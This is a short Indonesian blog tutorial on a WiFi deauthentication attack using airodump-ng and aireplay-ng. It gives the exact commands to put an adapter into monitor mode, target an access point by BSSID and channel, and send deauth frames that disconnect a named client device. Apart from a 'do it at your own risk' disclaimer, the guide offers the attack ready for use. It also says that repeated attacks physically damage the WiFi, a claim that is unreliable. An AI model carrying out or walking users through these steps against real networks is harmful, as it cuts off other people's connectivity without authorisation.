Deauthentication using AirReplay

Galuh Muhammad Iman Akbar
2 min readJun 21, 2021

Do it at your own risk !!

Deauthentication merupakan serangan dengan cara memutuskan koneksi device yang sudah terhubung pada Access Point, serangan ini akan sangat membebani WiFi dan jika dilakukan lebih sering maka WiFi akan menjadi rusak. saya biasanya menggunakan wireless adapter untuk melakukan serangan ini. Berikut merupakan langkah-langkah yang saya lakukan.

  1. Matikan wireless adapter, dan jadikan mode monitoring.
ifconfig wlxec086b1b9943 down
airodump-ng wlxec086b1b9943

Keterangan :

down = Merupakan command untuk mematikan interface

2. Kemudian pilih Access Point target.

disini saya melakukan serangan pada access point dengan ESSID wkwk berikut merupakan perintah terminal yang saya jalankan.

airodump-ng wlxec086b1b9943 -c 11 --bssid 5A:CC:84:70:8E:A5

Keterangan :

wlxec086b1b9943 = Merupakan interface LAN wireless adapter (ini setiap device pasti berbeda)

  • c = Merupakan channel
  • bssid = Merupakan MAC Address access point

3. Setelah menjalankan command tersebut, maka kita bisa monitoring, jaringan yang ada di access point tersebut, dan ternyata terdapat 1 device yang terhubung ke jaringan.

Air-Replay-ng

4. Kemudian lakukan serangan deauth, dengan menggunakan airreplay-ng

aireplay-ng wlxec086b1b9943 -0 20 -a 5A:CC:84:70:8E:A5 -c A0:AF:BD:5E:8D:5A

Keterangan :

  • wlxec086b1b9943 = Merupakan interface LAN wireless adapter (ini setiap device pasti berbeda)
  • -0 = merupakan perintah untuk melakukan deauth
  • 20 = merupakan banyaknya request deauth yang dikirimkan
  • -a = MAC Address access point
  • -c = MAC Address client yang akan di deauth

Dengan dilakukannya serangan tersebut, device tersebut akan terputus koneksinya ke access point.

--

--

Galuh Muhammad Iman Akbar

Fokus apa yang menjadi kelebihanmu kekurangan cukup di syukuri saja